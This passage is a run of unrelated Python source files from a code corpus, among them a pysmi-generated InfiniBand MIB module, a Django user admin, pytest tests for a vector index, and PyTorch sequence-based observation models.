            stepfunctions_endpoint_url: URL for making requests to the Step Functions API
        """
        self.name = name
        self.stepfunctions = boto3.client(
            "stepfunctions", endpoint_url=stepfunctions_endpoint_url
        )
        self.executions = ExecutionCollection([self])
        # Assemble the state machine ARN from the client's region and the
        # configured account id.
        region = self.stepfunctions.meta.region_name
        self.state_machine_arn = (
            f"arn:aws:states:{region}:{AWS_ACCOUNT_ID}:stateMachine:{self.name}"
        )
| StarcoderdataPython |
3230212 | <filename>mods/LA/demo.py
#
from common import *
from mods.LA.raanes2015 import step, X0
from mods.Lorenz95.demo import amplitude_animation
##
# Build a recursive simulator from the LA model's step function, then run a
# 500-step trajectory from a single sampled initial condition.
simulator = make_recursive(step, prog="Simulating")
x0 = X0.sample(1).squeeze()
xx = simulator(x0, k=500, t=0, dt=1)
##
# Animate the simulated field on a periodic domain, showing every 3rd frame.
amplitude_animation(xx,periodic=True,skip=3)
##
| StarcoderdataPython |
6582773 | <gh_stars>10-100
#
# PySNMP MIB module IB-TC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IB-TC-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:22:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Machine-generated by pysmi from the IB-TC-MIB ASN.1 source -- do not edit
# by hand; regenerate from the MIB instead.
# NOTE(review): `mibBuilder` is not defined in this file; pysnmp injects it
# into the module namespace when the compiled MIB is loaded -- TODO confirm.
# Pull the base SMI / textual-convention symbols from already-loaded modules.
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Gauge32, Bits, Counter64, IpAddress, iso, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Counter32, Integer32, Unsigned32, TimeTicks, experimental, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Gauge32", "Bits", "Counter64", "IpAddress", "iso", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Counter32", "Integer32", "Unsigned32", "TimeTicks", "experimental", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
# Module identity: OID 1.3.6.1.3.117.1 under the experimental subtree.
ibTcMIB = ModuleIdentity((1, 3, 6, 1, 3, 117, 1))
ibTcMIB.setRevisions(('2006-06-27 00:00',))
if mibBuilder.loadTexts: ibTcMIB.setLastUpdated('200606270000Z')
if mibBuilder.loadTexts: ibTcMIB.setOrganization('IETF IP over IB (IPOIB) Working Group')
infinibandMIB = MibIdentifier((1, 3, 6, 1, 3, 117))
# InfiniBand textual conventions generated from IB-TC-MIB.  Each class pairs
# pysnmp's TextualConvention with a base SMI type and narrows it with a
# subtypeSpec constraint (value range, size, or enumeration).
# NOTE(review): several 'reference' strings below contain what look like IP
# addresses (e.g. "Section 172.16.17.32"); comparing with the intact
# "Section 18.2.4.1" in IbSmPortList, these appear to be spec section
# numbers corrupted by an anonymization pass -- restore them from the
# InfiniBand Architecture spec before relying on these citations.
class IbPort(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches and (C18-14.a1) for switch port 0, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 254)

# Physical port numbers (1-based; 255 marks "invalid" in the *AndInvalid TC).
class IbPhysPort(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 254)

class IbPhysPortAndInvalid(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 255)

# Deprecated data-port variants, kept for backward compatibility.
class IbDataPort(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'deprecated'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 254)

class IbDataPortAndInvalid(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'deprecated'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 255)

# Virtual lanes: 0-15 in general, 0-14 for data VLs (VL15 is management).
class IbVirtualLane(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 3.5.7.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 15)

class IbDataVirtualLane(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 3.5.7.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 14)

# Local identifiers: full DLID space, unicast range, multicast range.
class IbDlid(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 65535)

class IbUnicastLid(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 49151)

class IbMulticastLid(TextualConvention, Unsigned32):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
    status = 'current'
    displayHint = 'd'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(49152, 65535)

# Fixed-length octet-string conventions.
class IbGuid(TextualConvention, OctetString):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.'
    status = 'current'
    displayHint = '1x:'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
    fixedLength = 8

class IbSmaPortList(TextualConvention, OctetString):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches and (C18-14.a1) for switch port 0, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(32, 32)
    fixedLength = 32

class IbSmPortList(TextualConvention, OctetString):
    reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 18.2.4.1 (C18-10.a1) for switches, Section 17.2.1.3 (C17-7.a1) for Channel Adapters, and Section 19.2.4.2 for routers.'
    status = 'deprecated'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(32, 32)
    fixedLength = 32

class IbIpoibClientIdentifier(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(20, 20)
    fixedLength = 20

class IbSmSubnetPrefix(TextualConvention, OctetString):
    status = 'current'
    displayHint = '2x:'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
    fixedLength = 8

# Enumerated conventions (subnet-manager state, node type, MTU codes).
class IbSmState(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
    namedValues = NamedValues(("notActive", 0), ("discovering", 1), ("standby", 2), ("master", 3))

class IbNodeType(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
    namedValues = NamedValues(("unknown", 0), ("channelAdapter", 1), ("switch", 2), ("router", 3))

class IbMtu(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
    namedValues = NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5))

# Partition keys (full 16-bit P_Key; IbPartition is the 15-bit base value).
class IbPartitionKey(TextualConvention, Unsigned32):
    status = 'current'
    displayHint = 'x'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 65535)

class IbPartition(TextualConvention, Unsigned32):
    status = 'current'
    displayHint = 'x'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 32767)

class IbTransportTime(TextualConvention, Unsigned32):
    status = 'current'
    subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 31)

# Export all conventions so dependent MIB modules can import them.
mibBuilder.exportSymbols("IB-TC-MIB", IbSmSubnetPrefix=IbSmSubnetPrefix, IbPhysPort=IbPhysPort, IbTransportTime=IbTransportTime, IbIpoibClientIdentifier=IbIpoibClientIdentifier, IbUnicastLid=IbUnicastLid, IbSmPortList=IbSmPortList, IbMulticastLid=IbMulticastLid, ibTcMIB=ibTcMIB, IbSmState=IbSmState, PYSNMP_MODULE_ID=ibTcMIB, IbDlid=IbDlid, IbGuid=IbGuid, IbPort=IbPort, IbDataPort=IbDataPort, IbDataPortAndInvalid=IbDataPortAndInvalid, IbVirtualLane=IbVirtualLane, IbNodeType=IbNodeType, IbMtu=IbMtu, infinibandMIB=infinibandMIB, IbDataVirtualLane=IbDataVirtualLane, IbPartition=IbPartition, IbPhysPortAndInvalid=IbPhysPortAndInvalid, IbSmaPortList=IbSmaPortList, IbPartitionKey=IbPartitionKey)
| StarcoderdataPython |
9710086 | <gh_stars>10-100
BASE_URL = "https://raw.communitydragon.org/"
def strip_k(string: str) -> str:
    '''Strip a leading "k" from *string* if present.

    BUG FIX: the original indexed string[0] unconditionally for non-None
    input, so the empty string raised IndexError; it is now returned
    unchanged, like None.
    '''
    if not string: return string
    return string[1:] if string[0] == "k" else string
def abs_url(link: str, version="latest") -> str:
    '''Return the CDragon url for the given game asset url'''
    if link is None: return link
    # All CDragon asset paths live under this per-version prefix.
    prefix = BASE_URL + version + "/plugins/rcp-be-lol-game-data/global/default/"
    link = link.lower()
    parts = link.split("/lol-game-data/assets/")
    if len(parts) == 2:
        # Link contained the client-asset marker: keep only the tail.
        return prefix + parts[1]
    # Otherwise treat the whole (lowercased) link as a relative path.
    return prefix + link
def sanitize(string: str) -> str:
    '''Strip markup tags and @placeholder@ tokens from a CDragon description.

    `<br>` tags become newlines (unless the output already ends with a
    space); each @...@ placeholder is replaced by the literal "(?)".
    '''
    if string is None: return string
    out = []
    in_tag = False          # currently between '<' and '>'
    in_placeholder = False  # currently between a pair of '@'
    tag_name = ""           # characters accumulated inside the current tag
    for ch in string:
        # Ordinary character outside any tag/placeholder: keep it.
        if not in_tag and not in_placeholder and ch not in "<>@":
            out.append(ch)
        if ch == "<":
            in_tag = True
        elif ch == ">":
            in_tag = False
            # A bare <br> turns into a newline unless preceded by a space.
            if tag_name == "br" and out and out[-1] != " ":
                out.append("\n")
            tag_name = ""
        elif ch == "@" and not in_placeholder:
            in_placeholder = True
            out.append("(?)")
        elif ch == "@":
            in_placeholder = False
        if in_tag and ch not in "<>":
            tag_name += ch
    return "".join(out)
| StarcoderdataPython |
9618156 | import pytest
import numpy as np
from needlestack.apis import indices_pb2
@pytest.mark.parametrize(
    "X,k",
    [
        (np.array([[1, 1, 1]]), 1),
        (np.array([[1, 1, 1]]), 5),
        (np.array([[1, 1, 1]]), 1000000),
    ],
)
def test_query(shard_3d, X, k):
    """Querying a loaded shard returns at most k well-formed result items."""
    shard_3d.load()
    results = shard_3d.query(X, k)
    assert isinstance(results, list)
    # k is clamped to the number of indexed vectors.
    assert len(results) == min(k, shard_3d.index.count)
    for item in results:
        distance_kind = item.WhichOneof("distance")
        if distance_kind in ("float32", "float16"):
            assert item.float_distance >= 0.0
        else:
            assert item.double_distance >= 0.0
        assert isinstance(item.metadata, indices_pb2.Metadata)
@pytest.mark.parametrize("id", ["test_index-0", "doesnt exists"])
def test_retrieve(shard_3d, id):
    """retrieve() yields a RetrievalResultItem whether or not the id exists."""
    shard_3d.enable_id_to_vector = True
    shard_3d.load()
    item = shard_3d.retrieve(id)
    assert isinstance(item, indices_pb2.RetrievalResultItem)
| StarcoderdataPython |
104188 | from django.contrib import admin
from django import forms
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from profiles.models import FavoritesProducts, Address
from accounts.models import User
from products.models import Product
from carts.models import Cart
from orders.models import Order
from django.contrib import messages
from django.shortcuts import redirect
from .models import User
class UserCreationForm(forms.ModelForm):
    """Admin form for creating a user: asks for the password twice and
    stores it hashed via set_password()."""

    password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
    password2 = forms.CharField(
        label="Password confirmation",
        widget=forms.PasswordInput
    )

    class Meta:
        model = User
        fields = ('phone_number',)

    def clean_password2(self):
        # Reject mismatched passwords; empty fields are validated elsewhere.
        first = self.cleaned_data.get("password1")
        second = self.cleaned_data.get("password2")
        if first and second and first != second:
            raise forms.ValidationError("Passwords don't match")
        return second

    def save(self, commit=True):
        """Hash the chosen password before (optionally) persisting."""
        user = super().save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user
class UserChangeForm(forms.ModelForm):
    """Admin form for editing a user; the password hash is shown read-only."""

    password = ReadOnlyPasswordHashField()

    class Meta:
        model = User
        fields = '__all__'

    def clean_password(self):
        # Always keep the original hash regardless of what was submitted.
        return self.initial["password"]
class UserAdmin(BaseUserAdmin):
    """Admin for the phone-number based User model.

    Users cannot be added from the admin, every visible field is read-only,
    and deleting a non-admin user manually cascades over the user's
    addresses, favorites, orders, carts and products first.
    """
    form = UserChangeForm
    add_form = UserCreationForm

    list_display = ('id', 'phone_number', 'email', 'full_name')
    list_display_links = ('id', 'phone_number')
    list_filter = ('user_type',)
    readonly_fields = ('id', 'phone_number', 'email', 'full_name')
    fieldsets = (
        (None, {'fields': ('phone_number', 'password')}),
        ('Personal info', {'fields': ('email', 'first_name', 'last_name', 'national_code')}),
        ('Permissions', {'fields': ('is_admin',)}),
    )
    # BUG FIX: both password fields had been mangled to the placeholder
    # '<PASSWORD>'; restored to the password1/password2 pair declared by
    # UserCreationForm (the standard BaseUserAdmin pattern).
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('phone_number', 'password1', 'password2')}
        ),
    )
    search_fields = ('email', 'first_name', 'last_name', 'phone_number')
    ordering = ('phone_number',)
    filter_horizontal = ()

    def has_add_permission(self, request):
        # Users register through the site, never through the admin.
        return False

    def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
        # Hide the save buttons: every editable field is read-only anyway.
        extra_context = extra_context or {}
        extra_context['show_save_and_continue'] = False
        extra_context['show_save'] = False
        return super(UserAdmin, self).changeform_view(request, object_id, extra_context=extra_context)

    def has_delete_permission(self, request, obj=None):
        # BUG FIX: the default was "obj=id", which silently captured the
        # builtin id() function; the Django convention is obj=None.
        return True

    def delete_view(self, request, object_id, form_url='', extra_context=None):
        """Refuse to delete admins; cascade-delete related rows otherwise."""
        user = User.objects.get(id=object_id)
        if user.user_type == 'Admin':
            messages.error(request, 'Admin cannot be deleted')
            return redirect('/admin/accounts/user/')
        # Delete dependent rows first -- presumably the FKs have no DB-level
        # cascade; TODO confirm against the model definitions.
        for address in Address.objects.filter(user=user):
            address.delete()
        for favorite in FavoritesProducts.objects.filter(user=user):
            favorite.delete()
        for order in Order.objects.filter(user=user):
            order.delete()
        for cart in Cart.objects.filter(user=user):
            cart.delete()
        for product in Product.objects.filter(user=user):
            product.delete()
        user.delete()
        messages.add_message(request, messages.INFO, 'User deleted')
        return redirect('/admin/accounts/user/')
# Register the custom user admin and drop the default Group admin, which
# this project does not use.
admin.site.register(User, UserAdmin)
admin.site.unregister(Group)
admin.site.site_url="/admin/"
132827 | import torch
import torch.nn as nn
from ltprg.model.seq import sort_seq_tensors, unsort_seq_tensors, SequenceModel
from torch.autograd import Variable
class ObservationModel(nn.Module):
    """Base class for modules that map a batch of observations to a
    transformed representation.  Provides save/load persistence keyed on
    the concrete subclass name."""

    def __init__(self):
        super(ObservationModel, self).__init__()

    def forward(self, observation):
        """ Computes batch of transformed observations """
        pass

    def on_gpu(self):
        """Return True if this module's parameters live on a GPU."""
        return next(self.parameters()).is_cuda

    def save(self, model_path):
        """Persist constructor params, weights and the concrete type name."""
        init_params = self._get_init_params()
        model_obj = dict()
        model_obj["init_params"] = init_params
        model_obj["state_dict"] = self.state_dict()
        model_obj["obs_type"] = type(self).__name__
        torch.save(model_obj, model_path)

    @staticmethod
    def load(model_path):
        """Reconstruct a saved observation model from model_path.

        Raises:
            ValueError: if the stored obs_type is not a known subclass.
        """
        model_obj = torch.load(model_path)
        init_params = model_obj["init_params"]
        state_dict = model_obj["state_dict"]
        obs_type = model_obj["obs_type"]
        if obs_type == "ObservationModelIndexedSequential":
            model = ObservationModelIndexedSequential.make(init_params)
        elif obs_type == "ObservationModelReorderedSequential":
            model = ObservationModelReorderedSequential.make(init_params)
        else:
            # BUG FIX: an unknown type previously left model = None and
            # crashed below with an opaque AttributeError; fail loudly.
            raise ValueError("Unrecognized observation model type: " + str(obs_type))
        model.load_state_dict(state_dict)
        return model
class ObservationModelIndexed(ObservationModel):
    """Observation model that produces one transformed vector per index and
    concatenates each with its one-hot index indicator."""

    def __init__(self, indexed_obs_size, num_indices):
        super(ObservationModelIndexed, self).__init__()
        self._indexed_obs_size = indexed_obs_size  # size of each per-index output
        self._num_indices = num_indices            # number of indices per example

    # observations: batch x input observation
    # indices (one-hots): batch x (num_indices) x (num_indices)
    # return batch x num_indices x indexd_obs_size
    def _forward_for_indices(self, observation, indices):
        """
        Computes batch of transformed observations from input observations
        and indexed index indicators
        """
        pass

    def forward(self, observation):
        # One identity matrix per batch element: row i is the one-hot for index i.
        indices = torch.eye(self._num_indices).unsqueeze(0).expand(observation[0].size(0), self._num_indices, self._num_indices)
        if self.on_gpu():
            device = 0
            # assumes observation is either a tensor or a (tensor, ...) tuple
            # with the data tensor first -- TODO confirm across callers
            if isinstance(observation, tuple):
                device = observation[0].get_device()
            else:
                device = observation.get_device()
            indices = indices.cuda(device)
        indices = Variable(indices, requires_grad=False)
        transformed = self._forward_for_indices(observation, indices)
        # Append each index's one-hot to its transformed vector, then flatten
        # to batch x (num_indices * (num_indices + indexed_obs_size)).
        transformed = torch.cat((transformed, indices), 2)
        return transformed.view(indices.size(0), self._num_indices*(self._num_indices+self._indexed_obs_size))
class ObservationModelIndexedSequential(ObservationModelIndexed):
    """Indexed observation model that encodes a (sequence, length) observation
    with a SequenceModel conditioned on each index one-hot, then decodes the
    final hidden state into a fixed-size vector per index."""

    def __init__(self, indexed_obs_size, num_indices, seq_model):
        super(ObservationModelIndexedSequential, self).__init__(indexed_obs_size, num_indices)
        # Record constructor arguments so save()/make() can round-trip.
        self._init_params = dict()
        self._init_params["indexed_obs_size"] = indexed_obs_size
        self._init_params["num_indices"] = num_indices
        self._init_params["arch_type"] = type(seq_model).__name__
        self._init_params["seq_model"] = seq_model._get_init_params()
        self._seq_model = seq_model
        self._decoder = nn.Linear(seq_model.get_hidden_size()*seq_model.get_directions(), indexed_obs_size)
        self._decoder_nl = nn.Tanh()

    def _get_init_params(self):
        return self._init_params

    @staticmethod
    def make(init_params):
        """Reconstruct an instance from the dict produced by _get_init_params."""
        indexed_obs_size = init_params["indexed_obs_size"]
        # BUG FIX: previously read init_hidden["num_indices"], but
        # 'init_hidden' is undefined here -- every call raised NameError.
        num_indices = init_params["num_indices"]
        seq_model = SequenceModel.make(init_params["seq_model"], init_params["arch_type"])
        return ObservationModelIndexedSequential(indexed_obs_size, num_indices, seq_model)

    def get_seq_model(self):
        return self._seq_model

    # observations: batch x input observation
    # indices (one-hots): batch x (num_indices) x (num_indices)
    # return batch x num_indices x indexed_obs_size
    def _forward_for_indices(self, observation, indices):
        num_indices = indices.size(2)
        batch_size = indices.size(0)
        max_len = observation[0].size(1)
        seq = observation[0].transpose(0,1) # After transpose: Length x batch
        seq_length = observation[1] # Batch
        # Replicate the sequence num_indices times: length x (indices*batch).
        if len(seq.size()) == 2:
            seq = seq.unsqueeze(1).expand(max_len, num_indices, batch_size).contiguous().view(-1, num_indices*batch_size)
        else:
            seq = seq.unsqueeze(1).expand(max_len, num_indices, batch_size, seq.size(2)).contiguous().view(-1, num_indices*batch_size, seq.size(2)).float()
        seq_length = seq_length.unsqueeze(1).expand(batch_size, num_indices).contiguous().view(-1, num_indices*batch_size).squeeze()
        indices = indices.contiguous().view(-1, num_indices)
        # Sort by length (packing requirement), run the sequence model with
        # the one-hot index as auxiliary input, then restore original order.
        sorted_seq, sorted_length, sorted_inputs, sorted_indices = sort_seq_tensors(seq, seq_length, inputs=[indices], on_gpu=self.on_gpu())
        output, hidden = self._seq_model(seq_part=sorted_seq, seq_length=sorted_length, input=sorted_inputs[0])
        if isinstance(hidden, tuple): # Handle LSTM
            hidden = hidden[0]
        # Decode the (directions-concatenated) final hidden state per sequence.
        decoded = self._decoder(hidden.transpose(0,1).contiguous().view(-1, hidden.size(0)*hidden.size(2)))
        output = self._decoder_nl(decoded)
        unsorted_output = unsort_seq_tensors(sorted_indices, [output])[0]
        unsorted_output = unsorted_output.view(batch_size, num_indices, self._indexed_obs_size)
        return unsorted_output
class ObservationModelReordered(ObservationModel):
    """Observation model that produces one transformed vector per integer
    index (0..num_indices-1) and flattens them into a single vector."""

    def __init__(self, indexed_obs_size, num_indices):
        super(ObservationModelReordered, self).__init__()
        self._indexed_obs_size = indexed_obs_size  # size of each per-index output
        self._num_indices = num_indices            # number of indices per example

    # observations: batch x input observation
    # indices (one-hots): batch x num_indices
    # return batch x num_indices x indexed_obs_size
    def _forward_for_indices(self, observation, indices):
        """
        Computes batch of transformed observations from input observations
        and indexed index indicators
        """
        pass

    def forward(self, observation):
        # Integer indices 0..num_indices-1, replicated across the batch.
        indices = torch.arange(0, self._num_indices).unsqueeze(0).expand(observation[0].size(0), self._num_indices).long()
        if self.on_gpu():
            device = 0
            # assumes observation is either a tensor or a (tensor, ...) tuple
            # with the data tensor first -- TODO confirm across callers
            if isinstance(observation, tuple):
                device = observation[0].get_device()
            else:
                device = observation.get_device()
            indices = indices.cuda(device)
        indices = Variable(indices, requires_grad=False)
        transformed = self._forward_for_indices(observation, indices)
        # Flatten to batch x (num_indices * indexed_obs_size).
        return transformed.view(indices.size(0), self._num_indices*self._indexed_obs_size)
class ObservationModelReorderedSequential(ObservationModelReordered):
    """Reordered observation model: for each index i, swap object i with the
    last object of the sequence, encode the reordered sequence with a
    SequenceModel, and use the final hidden state as the per-index vector."""

    def __init__(self, indexed_obs_size, num_indices, seq_model):
        super(ObservationModelReorderedSequential, self).__init__(indexed_obs_size, num_indices)
        # Record constructor arguments so save()/make() can round-trip.
        self._init_params = dict()
        self._init_params["indexed_obs_size"] = indexed_obs_size
        self._init_params["num_indices"] = num_indices
        self._init_params["arch_type"] = type(seq_model).__name__
        self._init_params["seq_model"] = seq_model._get_init_params()
        self._seq_model = seq_model
        # The hidden state is used directly (no decoder), so sizes must agree.
        if indexed_obs_size != seq_model.get_hidden_size()*seq_model.get_directions():
            raise ValueError("indxed_obs_size must be the same as the seq_model hidden size")

    def _get_init_params(self):
        return self._init_params

    @staticmethod
    def make(init_params):
        """Reconstruct an instance from the dict produced by _get_init_params."""
        indexed_obs_size = init_params["indexed_obs_size"]
        # BUG FIX: previously read init_hidden["num_indices"], but
        # 'init_hidden' is undefined here -- every call raised NameError.
        num_indices = init_params["num_indices"]
        seq_model = SequenceModel.make(init_params["seq_model"], init_params["arch_type"])
        return ObservationModelReorderedSequential(indexed_obs_size, num_indices, seq_model)

    def get_seq_model(self):
        return self._seq_model

    # observations: batch x input observation
    # indices: batch x num_indices
    # return batch x num_indices x indexed_obs_size
    def _forward_for_indices(self, observation, indices):
        num_indices = indices.size(1)
        batch_size = indices.size(0)
        max_len = observation[0].size(1)
        obj_size = observation[0].size(2)
        # Build one reordered copy of the sequence per index, then encode all
        # batch*num_indices sequences in one packed sequence-model pass.
        reordered_obs = self._make_obs_reorderings(indices, observation)
        seq = reordered_obs[0].view(batch_size*num_indices, max_len, obj_size).transpose(0,1).float()
        seq_length = reordered_obs[1].contiguous().view(batch_size*num_indices)
        sorted_seq, sorted_length, sorted_indices = sort_seq_tensors(seq, seq_length, inputs=None, on_gpu=self.on_gpu())
        output, hidden = self._seq_model(seq_part=sorted_seq, seq_length=sorted_length, input=None)
        if isinstance(hidden, tuple): # Handle LSTM
            hidden = hidden[0]
        # Use the (directions-concatenated) final hidden state as the output.
        output = hidden.transpose(0,1).contiguous().view(-1, hidden.size(0)*hidden.size(2))
        unsorted_output = unsort_seq_tensors(sorted_indices, [output])[0]
        unsorted_output = unsorted_output.view(batch_size, num_indices, self._indexed_obs_size)
        return unsorted_output

    # observation: batch x length x obj size
    # indices: batch x num_indices
    # return: batch x num_indices x length x obj size (reorderings)
    def _make_obs_reorderings(self, indices, observation):
        """For each (batch, index) pair, swap object `index` with the last
        valid object of that sequence (lengths vary per batch element)."""
        batch_size = observation[0].size(0)
        num_indices = indices.size(1)
        max_len = observation[0].size(1)
        obj_size = observation[0].size(2)
        seq_len = observation[1]
        indexed_objs = self._get_indexed_obs_obj(indices, observation)
        last_objs = self._get_last_obs_obj(num_indices, observation)
        # Tile the sequence num_indices times and flatten so each (batch,
        # index, position) maps to one row that can be overwritten in place.
        seq = observation[0].unsqueeze(1).expand(batch_size, num_indices, max_len, obj_size).contiguous().view(batch_size*num_indices*max_len, obj_size)
        seq_clone = seq.clone()
        offset = Variable(torch.arange(0,batch_size*num_indices).long(), requires_grad=False)*max_len
        last_indices = Variable(torch.ones(batch_size, num_indices).long()*(observation[1].unsqueeze(1).expand(batch_size,num_indices)-1), requires_grad=False).view(batch_size*num_indices)
        if self.on_gpu():
            device = observation[0].get_device()
            offset = offset.cuda(device)
            last_indices = last_indices.cuda(device)
        offset_indices = offset+indices.view(batch_size*num_indices)
        offset_last_indices = offset + last_indices
        # Perform the swap: indexed position gets the last object, and the
        # last valid position gets the indexed object.
        seq_clone[offset_indices] = last_objs.view(batch_size*num_indices, obj_size)
        seq_clone[offset_last_indices] = indexed_objs.view(batch_size*num_indices, obj_size)
        seq_clone = seq_clone.view(batch_size, num_indices, max_len, obj_size)
        seq_len = seq_len.unsqueeze(1).expand(batch_size, num_indices)
        return (seq_clone, seq_len)

    # observation: batch x length x obj size
    # indices: batch x num_indices
    # return: batch x num_indices x obj size, num_indices*batch_size (indices)
    def _get_indexed_obs_obj(self, indices, observation):
        """Gather the object at each requested index for every batch element."""
        batch_size = observation[0].size(0)
        seq_length = observation[0].size(1)
        obj_size = observation[0].size(2)
        num_indices = indices.size(1)
        # NOTE(review): the row offset multiplies by num_indices rather than
        # seq_length; this is only correct when the two are equal -- confirm
        # against callers before reusing with num_indices != max length.
        offset = Variable(torch.arange(0,batch_size).unsqueeze(0).expand(num_indices, batch_size).transpose(0,1).contiguous().view(num_indices*batch_size).long(), requires_grad=False)*num_indices
        if self.on_gpu():
            device = observation[0].get_device()
            offset = offset.cuda(device)
        offset_indices = offset+indices.view(batch_size*num_indices)
        indexed_obs = observation[0].contiguous().view(batch_size*seq_length, obj_size)[offset_indices]
        return indexed_obs.view(batch_size, num_indices, obj_size)

    # observation: batch x length x obj size
    # return: batch x num_indices x obj size, num_indices*batch_size (indices)
    def _get_last_obs_obj(self, num_indices, observation):
        """Gather the last valid object (per the length tensor) of each
        sequence, replicated num_indices times."""
        batch_size = observation[0].size(0)
        indices = Variable(torch.ones(batch_size, num_indices).long()*(observation[1].unsqueeze(1).expand(batch_size,num_indices)-1), requires_grad=False)
        if self.on_gpu():
            device = observation[0].get_device()
            indices = indices.cuda(device)
        return self._get_indexed_obs_obj(indices, observation)
| StarcoderdataPython |
6496630 | <filename>k_means.py<gh_stars>0
import pandas as pd
from sklearn.cluster import MiniBatchKMeans
from sklearn.cluster import KMeans
if __name__ == '__main__':
    # Load the candy dataset, keeping only the numeric feature columns.
    df_candies = pd.read_csv('./data/raw/candy.csv')
